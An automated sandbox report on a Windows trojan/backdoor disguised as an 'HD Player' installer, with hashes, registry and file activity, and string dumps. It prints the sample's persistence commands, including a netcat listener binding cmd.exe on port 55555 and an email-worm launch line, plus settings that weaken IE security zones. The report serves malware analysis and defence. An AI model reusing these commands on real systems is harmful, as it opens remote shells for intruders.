HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.FAkeAlert.105 (AdAware), Backdoor.Win32.PcClient.FD, RemoteAdmin.Win32.NetCat.FD, SpyTool.Win32.Ardamax.FD, GenericEmailWorm.YR, RemoteAdminNetCat.YR (Lavasoft MAS)Behaviour: Trojan, Backdoor, RemoteAdmin, Worm, EmailWorm, SpyTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 55109bccd61a4a8c45d89fcd86fc33eb
SHA1: 26a2a15622f50ad73d2d8483f64a3969d5cc39d9
SHA256: 810c9f093cfcd3809b94e07be939fb1378408384812f78eba08cca9739a6e4e0
SSDeep: 49152:mJyF27K7UeQ7C12So1JhGA02avWCiV7N7aeh:mqXUJWQhbGN1diV7pF
Size: 1916928 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: App.install
Created at: 2008-04-13 21:32:45
Analyzed on: WindowsXP SP3 32-bit
Summary: RemoteAdmin. A system tool used to allow remote access or control of computer systems.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The RemoteAdmin creates the following process(es):
nc.exe:1524
regedit.exe:580
mivirus.exe:1108
%original file name%.exe:716
The RemoteAdmin injects its code into the following process(es):
WLA.exe:220
rundll32.exe:1112
File activity
The process mivirus.exe:1108 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\KUFPGL\WLA.01 (82 bytes)
%Documents and Settings%\All Users\Application Data\KUFPGL\WLA.00 (2 bytes)
%Documents and Settings%\All Users\Application Data\KUFPGL\WLA.exe (15021 bytes)
%Documents and Settings%\All Users\Application Data\KUFPGL\WLA.02 (57 bytes)
The process %original file name%.exe:716 makes changes in the file system.
The RemoteAdmin creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\mivirus.exe (34097 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\foto.jpg (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\wsetup.cmd (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\nc.exe (489 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\INDEXH~1.TXT (122 bytes)
Registry activity
The process nc.exe:1524 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 C8 7E F5 20 45 35 F0 5B 15 3A 66 6B 4C 06 71"
The process WLA.exe:220 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 76 0D 6B 8C E8 40 71 C6 C5 9C 82 4E 8F C2 5B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WLA Start" = "%Documents and Settings%\All Users\Application Data\KUFPGL\WLA.exe"
The process regedit.exe:580 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A0 80 50 62 CD 67 4D 7D A1 23 CC A2 87 C2 3B 15"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "c:\windows\system32\index.html"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "c:\windows\system32\nc.exe -d -L -p 55555 -e cmd.exe"
"mivirus" = "c:\windows\system32\mivirus.exe metasploit@outlook.es"
The process rundll32.exe:1112 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F6 F0 66 FA F7 90 B7 80 B8 7F 6C 4F 4E 57 C0 1E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process mivirus.exe:1108 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 9F C1 64 DA 80 27 FA 62 E7 74 6D 3C B4 66 05"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\KUFPGL]
"WLA.exe" = "WLA"
The RemoteAdmin modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The RemoteAdmin modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The RemoteAdmin modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:716 makes changes in the system registry.
The RemoteAdmin creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 3D CE 8C 00 F4 0B 9E D6 E0 7D 97 CD 92 E6 5D"
To automatically run itself each time Windows is booted, the RemoteAdmin adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"wextract_cleanup0" = "rundll32.exe %System%\advpack.dll,DelNodeRunDLL32 C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\"
Dropped PE files
| MD5 | File path |
|---|---|
| 1c902448ba8c2385602c8f5315f35204 | c:\Documents and Settings\All Users\Application Data\KUFPGL\WLA.01 |
| d92e93f974e833bb6b9cae597fcf8a49 | c:\Documents and Settings\All Users\Application Data\KUFPGL\WLA.02 |
| bb251a9f308d046931dcba40fb1e0450 | c:\Documents and Settings\All Users\Application Data\KUFPGL\WLA.exe |
| 2ca71e1c40188f91f201bfadce3a3532 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\mivirus.exe |
| e0fb946c00b140693e3cf5de258c22a1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\IXP000.TMP\nc.exe |
| 2ca71e1c40188f91f201bfadce3a3532 | c:\WINDOWS\system32\mivirus.exe |
| e0fb946c00b140693e3cf5de258c22a1 | c:\WINDOWS\system32\nc.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Static Analysis
VersionInfo
Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.00.2900.5512
Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.
Legal Trademarks:
Original Filename: WEXTRACT.EXE
Internal Name: Wextract
File Version: 6.00.2900.5512 (xpsp.080413-2105)
File Description: Win32 Cabinet Self-Extractor
Comments:
Language: English (United States)
Company Name: Microsoft CorporationProduct Name: HD Player Product Version: 6.00.2900.5512Legal Copyright: (c) Microsoft Corporation. Reservados todos los derechos.Legal Trademarks: Original Filename: WEXTRACT.EXE Internal Name: Wextract File Version: 6.00.2900.5512 (xpsp.080413-2105)File Description: Win32 Cabinet Self-Extractor Comments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 39368 | 39424 | 4.5598 | 25b5d82208cedbbbc7ee430a4202819c |
| .data | 45056 | 7140 | 1024 | 2.94449 | 99858e86526942a66950c7139f78a725 |
| .rsrc | 53248 | 1875032 | 1875456 | 5.53893 | 1c55e68f26f69ffdd52ed1ab0c3e7bf5 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The RemoteAdmin connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_716:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
GDI32.dll
GDI32.dll
USER32.dll
USER32.dll
COMCTL32.dll
COMCTL32.dll
VERSION.dll
VERSION.dll
advapi32.dll
advapi32.dll
advpack.dll
advpack.dll
wininit.ini
wininit.ini
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\CurrentVersion\App Paths
setupapi.dll
setupapi.dll
setupx.dll
setupx.dll
IXPd.TMP
IXPd.TMP
TMP4351$.TMP
TMP4351$.TMP
FINISHMSG
FINISHMSG
USRQCMD
USRQCMD
ADMQCMD
ADMQCMD
msdownld.tmp
msdownld.tmp
wextract.pdb
wextract.pdb
PSSSSSSh
PSSSSSSh
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
GetWindowsDirectoryA
GetWindowsDirectoryA
ExitWindowsEx
ExitWindowsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
rundll32.exe %s,InstallHinfSection %s 128 %s
rundll32.exe %s,InstallHinfSection %s 128 %s
SHELL32.DLL
SHELL32.DLL
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
PendingFileRenameOperations
PendingFileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
System\CurrentControlSet\Control\Session Manager\FileRenameOperations
wextract_cleanup%d
wextract_cleanup%d
%s /D:%s
%s /D:%s
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
Command.com /c %s
Command.com /c %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\
98;777610
98;777610
%>==>===%
%>==>===%
==9>>=9=7
==9>>=9=7
>6<<66=9
>6<<66=9
<..4..=&
<..4..=&
978;7779767101
978;7779767101
==;=;9;9
==;=;9;9
>?>?>9>9=
>?>?>9>9=
88898881
88898881
;87787871
;87787871
@>=>>==>9>==9
@>=>>==>9>==9
@4...4...==
@4...4...==
@.4...4.4?>
@.4...4.4?>
foto.jpg
foto.jpg
INDEXH~1.TXT
INDEXH~1.TXT
mivirus.exe
mivirus.exe
nc.exe
nc.exe
wsetup.cmd
wsetup.cmd
84%s]
84%s]
hCrt
hCrt
m.Hg#
m.Hg#
#&.kK
#&.kK
le<.Drr
le<.Drr
4b4%c
4b4%c
ul.ISKs
ul.ISKs
m}.xM!
m}.xM!
{~.dhL
{~.dhL
%uX{}
%uX{}
p.ajW
p.ajW
[*%u#f
[*%u#f
UdpL{
UdpL{
%c%|m30zw
%c%|m30zw
u(\%x
u(\%x
.fs9r
.fs9r
Qbt.fo
Qbt.fo
R-2}.
R-2}.
.AT317
.AT317
$#nMN%X
$#nMN%X
n.Zt:
n.Zt:
>.ucE
>.ucE
rBuB%SaH
rBuB%SaH
.EyCDc
.EyCDc
t'.lFXID
t'.lFXID
4%8U@
4%8U@
.eyy"8
.eyy"8
%x,"O
%x,"O
tcpG
tcpG
;@,{]37_8
;@,{]37_8
.XGx/
.XGx/
cmDN
cmDN
<.dN)
<.dN)
^.PZ;N
^.PZ;N
7WI%f\
7WI%f\
.vs}"s2
.vs}"s2
gz}%c
gz}%c
vE%S/4
vE%S/4
n3{.kG
n3{.kG
.dc0>
.dc0>
3U.mU
3U.mU
yh.Hs<:@jR1W
yh.Hs<:@jR1W
-S}h_
-S}h_
T4{~.tO
T4{~.tO
.bE=(
.bE=(
DüSMd
DüSMd
e`X
e`X
:U.SB
:U.SB
l7.kj
l7.kj
Z-%x!|
Z-%x!|
PdO:.uu
PdO:.uu
JP%3U
JP%3U
v5ËUX
v5ËUX
nW Tk.jQ&
nW Tk.jQ&
qw%c
qw%c
8~.Foh
8~.Foh
pD=M{.to
pD=M{.to
B!{%us
B!{%us
$%D]V\lK
$%D]V\lK
.eTr,
.eTr,
.tGr3{
.tGr3{
$uC.Wo
$uC.Wo
In.hW
In.hW
R%U/Z
R%U/Z
u..wI
u..wI
.uj44
.uj44
%C@f$
%C@f$
,U.mi
,U.mi
tUDpZV
tUDpZV
X".fJ
X".fJ
!.LdT>r
!.LdT>r
r).Kn
r).Kn
_~.SrT
_~.SrT
~,.Ia
~,.Ia
T.Hp
T.Hp
.YiS3
.YiS3
%UK;W
%UK;W
i$?%x2
i$?%x2
ÑT\
ÑT\
%UMT1
%UMT1
.zu [5
.zu [5
.gf|g
.gf|g
x%fR{
x%fR{
.yBel
.yBel
.utbO
.utbO
x.cXG
x.cXG
-NJG}8
-NJG}8
J-s%c
J-s%c
%Slsw
%Slsw
%sZ;;
%sZ;;
.UTk#
.UTk#
d5%x?;
d5%x?;
& 2T?.PA
& 2T?.PA
.wuBb
.wuBb
g}.nU
g}.nU
%dmH1
%dmH1
)F,KX%C
)F,KX%C
MR%fv0}ui
MR%fv0}ui
(.VW;
(.VW;
8%Xi9
8%Xi9
k%Sssbd
k%Sssbd
"S.OZ
"S.OZ
>uZT.sQ
>uZT.sQ
&.tN9
&.tN9
Tb%SL
Tb%SL
%8.X@g
%8.X@g
)j%s]6_-
)j%s]6_-
T'@y.AE
T'@y.AE
6%f,
6%f,
`.EZ?O
`.EZ?O
P%UBK
P%UBK
y%1S&
y%1S&
h6%D _
h6%D _
?_sl%ud
?_sl%ud
dvO%f
dvO%f
.oHj9
.oHj9
.wSIp
.wSIp
|.rPO
|.rPO
F`.PP
F`.PP
.YSLFxE
.YSLFxE
(: j%f
(: j%f
crt;S
crt;S
.iN>y
.iN>y
/%%dl!
/%%dl!
\D.sgk
\D.sgk
].TomR
].TomR
Q.}%u
Q.}%u
.WJ@%
.WJ@%
Lxs.yU
Lxs.yU
.ok&gi
.ok&gi
vexEnTu
vexEnTu
n de espacio en: %s.
n de espacio en: %s.
Mensaje de sistema: %s.5No se puede encontrar uno de los recursos necesarios.#
Mensaje de sistema: %s.5No se puede encontrar uno de los recursos necesarios.#
n del sistema operativo./Error en la solicitud de asignaci
n del sistema operativo./Error en la solicitud de asignaci
n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio primero y presione Reintentar, o presione Cancelar para salir del programa de instalaci
n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio primero y presione Reintentar, o presione Cancelar para salir del programa de instalaci
n.XLa carpeta no es v
n.XLa carpeta no es v
rese de que la carpeta existe y se puede escribir en ella.DDebe especificar una carpeta con la ruta completa o elegir Cancelar.
rese de que la carpeta existe y se puede escribir en ella.DDebe especificar una carpeta con la ruta completa o elegir Cancelar.
n de carpeta.DNo se puede cargar las funciones requeridas por el di
n de carpeta.DNo se puede cargar las funciones requeridas por el di
logo Examinar.\No se pudo cargar el archivo Shell32.dll, requerido por el cuadro de di
logo Examinar.\No se pudo cargar el archivo Shell32.dll, requerido por el cuadro de di
n del proceso <%s>. Causa: %s5El tama
n del proceso <%s>. Causa: %s5El tama
ster en este sistema no es soportado.3Uno de los recursos necesarios parece estar da
ster en este sistema no es soportado.3Uno de los recursos necesarios parece estar da
ado.[Es necesario Windows 95 o Windows NT 4.0 Beta 2 o posterior para realizar esta instalaci
ado.[Es necesario Windows 95 o Windows NT 4.0 Beta 2 o posterior para realizar esta instalaci
Error al cargar %s]Error de GetProcAddress() en funci
Error al cargar %s]Error de GetProcAddress() en funci
n "%s". Causa posible: versi
n "%s". Causa posible: versi
n incorrecta de advpack.dll.@Es necesario Windows 95 o Windows NT para instalar este producto No se pudo crear la carpeta "%s"
n incorrecta de advpack.dll.@Es necesario Windows 95 o Windows NT para instalar este producto No se pudo crear la carpeta "%s"
Para instalar este programa, necesita %s KB disponibles en la unidad %s. Es recomendable que libere la cantidad necesaria de espacio en disco antes de continuar.
Para instalar este programa, necesita %s KB disponibles en la unidad %s. Es recomendable que libere la cantidad necesaria de espacio en disco antes de continuar.
n de la carpeta de Windows
n de la carpeta de Windows
)Apagar NT: Error en token de OpenProcess.*Apagar NT: Error en AdjustTokenPrivileges."Apagar NT: Error en ExitWindowsEx.
)Apagar NT: Error en token de OpenProcess.*Apagar NT: Error en AdjustTokenPrivileges."Apagar NT: Error en ExitWindowsEx.
n del archivo. Probablemente se deba a un problema de memoria baja (poco espacio en disco para el intercambio de archivos) o un archivo .CAB da
n del archivo. Probablemente se deba a un problema de memoria baja (poco espacio en disco para el intercambio de archivos) o un archivo .CAB da
ado.wEl programa de instalaci
ado.wEl programa de instalaci
n del volumen para la unidad (%s) .
n del volumen para la unidad (%s) .
Mensaje del sistema: %s.
Mensaje del sistema: %s.
n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio e int
n no pudo encontrar una unidad con %s KB de espacio en disco libres para instalar el programa. Libere un poco de espacio e int
ntelo de nuevo.hEl programa de instalaci
ntelo de nuevo.hEl programa de instalaci
[Otra copia del paquete "%s" ya est
[Otra copia del paquete "%s" ya est
Desea ejecutar otra copia?$No se pudo encontrar el archivo: %s.
Desea ejecutar otra copia?$No se pudo encontrar el archivo: %s.
No existe la carpeta "%s".
No existe la carpeta "%s".
Desea crearla?lOtra copia del paquete "%s" ya est
Desea crearla?lOtra copia del paquete "%s" ya est
lo es posible ejecutar una copia a la vez.OEl paquete "%s" no es compatible con la versi
lo es posible ejecutar una copia a la vez.OEl paquete "%s" no es compatible con la versi
n de Windows que est
n de Windows que est
ejecutando.^El paquete "%s" no es compatible con la versi
ejecutando.^El paquete "%s" no es compatible con la versi
n del archivo %s que se encuentra en su sistema.
n del archivo %s que se encuentra en su sistema.
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5512 (xpsp.080413-2105)
WEXTRACT.EXE
WEXTRACT.EXE
Sistema operativo Microsoft
Sistema operativo Microsoft
Windows
Windows
6.00.2900.5512
6.00.2900.5512
cmd.exe_1156:
.text
.text
`.data
`.data
.rsrc
.rsrc
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
msvcrt.dll
msvcrt.dll
USER32.dll
USER32.dll
SetConsoleInputExeNameW
SetConsoleInputExeNameW
APerformUnaryOperation: '%c'
APerformUnaryOperation: '%c'
APerformArithmeticOperation: '%c'
APerformArithmeticOperation: '%c'
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
MPR.dll
MPR.dll
RegEnumKeyW
RegEnumKeyW
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyExW
RegCreateKeyExW
RegOpenKeyExW
RegOpenKeyExW
ShellExecuteExW
ShellExecuteExW
CmdBatNotification
CmdBatNotification
GetWindowsDirectoryW
GetWindowsDirectoryW
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetConsoleOutputCP
GetConsoleOutputCP
_pipe
_pipe
GetProcessWindowStation
GetProcessWindowStation
cmd.pdb
cmd.pdb
foto.jpg c:\windows\system32\mivirus.exe metasploit@outlook.es
foto.jpg c:\windows\system32\mivirus.exe metasploit@outlook.es
oto.jpgc:\windows\system32\mivirus.exe metasploit@outlook.es
oto.jpgc:\windows\system32\mivirus.exe metasploit@outlook.es
foto.jpgivirus.exe metasploit@outlook.es
foto.jpgivirus.exe metasploit@outlook.es
foto.jpgus.exe metasploit@outlook.es
foto.jpgus.exe metasploit@outlook.es
foto.jpgrus.exe metasploit@outlook.es
foto.jpgrus.exe metasploit@outlook.es
foto.jpgxe metasploit@outlook.es
foto.jpgxe metasploit@outlook.es
foto.jpg2\mivirus.exe metasploit@outlook.es
foto.jpg2\mivirus.exe metasploit@outlook.es
foto.jpg5 -e cmd.exe
foto.jpg5 -e cmd.exe
start /b c:\windows\system32\mivirus.exe metasploit@outlook.es
start /b c:\windows\system32\mivirus.exe metasploit@outlook.es
foto.jpg-d -L -p 55555 -e cmd.exe
foto.jpg-d -L -p 55555 -e cmd.exe
foto.jpgnc.exe -d -L -p 55555 -e cmd.exe
foto.jpgnc.exe -d -L -p 55555 -e cmd.exe
foto.jpg.exe -d -L -p 55555 -e cmd.exe
foto.jpg.exe -d -L -p 55555 -e cmd.exe
foto.jpg
foto.jpg
foto.jpgs
foto.jpgs
CMD Internal Error %s
CMD Internal Error %s
)(&&())))(&))
)(&&())))(&))
)&((&)&))&())
)&((&)&))&())
)&((&)&)&()))
)&((&)&)&()))
)(&&()))&))))
)(&&()))&))))
CMD.EXE
CMD.EXE
()|&=,;"
()|&=,;"
COPYCMD
COPYCMD
\XCOPY.EXE
\XCOPY.EXE
CMDCMDLINE
CMDCMDLINE
WKERNEL32.DLL
WKERNEL32.DLL
Software\Policies\Microsoft\Windows\System
Software\Policies\Microsoft\Windows\System
0123456789
0123456789
cmd.exe
cmd.exe
DIRCMD
DIRCMD
%d.%d.d
%d.%d.d
Ungetting: '%s'
Ungetting: '%s'
DisableCMD
DisableCMD
GeToken: (%x) '%s'
GeToken: (%x) '%s'
%s\Shell\Open\Command
%s\Shell\Open\Command
%x %c
%x %c
*** Unknown type: %x
*** Unknown type: %x
Args: `%s'
Args: `%s'
Cmd: %s Type: %x
Cmd: %s Type: %x
%s (%s) %s
%s (%s) %s
oto.jpg
oto.jpg
c:\windows\system32\mivirus.exe metasploit@outlook.es
c:\windows\system32\mivirus.exe metasploit@outlook.es
ows\system32\nc.reg
ows\system32\nc.reg
m32\nc.reg
m32\nc.reg
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\foto.jpg
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\foto.jpg
look.es
look.es
k.es"
k.es"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP>
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP>
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
%WinDir%;%WinDir%\System32\Wbem;c:\Program Files\Wireshark
dows\system32\nc.reg
dows\system32\nc.reg
em32\nc.reg
em32\nc.reg
c.reg
c.reg
CMDEXTVERSION
CMDEXTVERSION
KEYS
KEYS
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP
c:\windows\system32\mivirus.exe metasploit@outlook.es
c:\windows\system32\mivirus.exe metasploit@outlook.es
%s %s
%s %s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\mivirus.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\IXP000.TMP\mivirus.exe
(%s) %s
(%s) %s
%s %s%s
%s %s%s
&()[]{}^=;!%' ,`~
&()[]{}^=;!%' ,`~
d%sd%s
d%sd%s
-%sd%sd%sd
-%sd%sd%sd
d%sd%sd
d%sd%sd
%s=%s
%s=%s
X-X
X-X
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS
<> -*/%()|^&=,
<> -*/%()|^&=,
\CMD.EXE
\CMD.EXE
Windows Command Processor
Windows Command Processor
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
Cmd.Exe
Cmd.Exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Press any key to continue . . . %0
Press any key to continue . . . %0
operable program or batch file.
operable program or batch file.
The system cannot execute the specified program.
The system cannot execute the specified program.
and press any key when ready. %0
and press any key when ready. %0
Microsoft Windows XP [Version %1]%0
Microsoft Windows XP [Version %1]%0
a pipe operation.
a pipe operation.
KEYS is on.
KEYS is on.
KEYS is off.
KEYS is off.
The process tried to write to a nonexistent pipe.
The process tried to write to a nonexistent pipe.
The switch /Y may be preset in the COPYCMD environment variable.
The switch /Y may be preset in the COPYCMD environment variable.
to prompt on overwrites unless COPY command is being executed from
to prompt on overwrites unless COPY command is being executed from
Switches may be preset in the DIRCMD environment variable. Override
Switches may be preset in the DIRCMD environment variable. Override
Quits the CMD.EXE program (command interpreter) or the current batch
Quits the CMD.EXE program (command interpreter) or the current batch
CMD.EXE. If executed from outside a batch script, it
CMD.EXE. If executed from outside a batch script, it
will quit CMD.EXE
will quit CMD.EXE
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
ERRORLEVEL that number. If quitting CMD.EXE, sets the process
Displays or sets a search path for executable files.
Displays or sets a search path for executable files.
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Type PATH ; to clear all search-path settings and direct cmd.exe to search
Changes the cmd.exe command prompt.
Changes the cmd.exe command prompt.
$B | (pipe)
$B | (pipe)
$V Windows XP version number
$V Windows XP version number
Displays, sets, or removes cmd.exe environment variables.
Displays, sets, or removes cmd.exe environment variables.
Displays the Windows XP version.
Displays the Windows XP version.
Tells cmd.exe whether to verify that your files are written correctly to a
Tells cmd.exe whether to verify that your files are written correctly to a
Records comments (remarks) in a batch file or CONFIG.SYS.
Records comments (remarks) in a batch file or CONFIG.SYS.
Press any key to continue . . . %0
Press any key to continue . . . %0
Directs cmd.exe to a labeled line in a batch program.
Directs cmd.exe to a labeled line in a batch program.
NOT Specifies that Windows XP should carry out
NOT Specifies that Windows XP should carry out
will execute the command after the ELSE keyword if the
will execute the command after the ELSE keyword if the
I The new environment will be the original environment passed
I The new environment will be the original environment passed
to the cmd.exe and not the current environment.
to the cmd.exe and not the current environment.
SEPARATE Start 16-bit Windows program in separate memory space
SEPARATE Start 16-bit Windows program in separate memory space
SHARED Start 16-bit Windows program in shared memory space
SHARED Start 16-bit Windows program in shared memory space
If it is an internal cmd command or a batch file then
If it is an internal cmd command or a batch file then
the command processor is run with the /K switch to cmd.exe.
the command processor is run with the /K switch to cmd.exe.
If it is not an internal cmd command or batch file then
If it is not an internal cmd command or batch file then
parameters These are the parameters passed to the command/program
parameters These are the parameters passed to the command/program
under Windows XP.
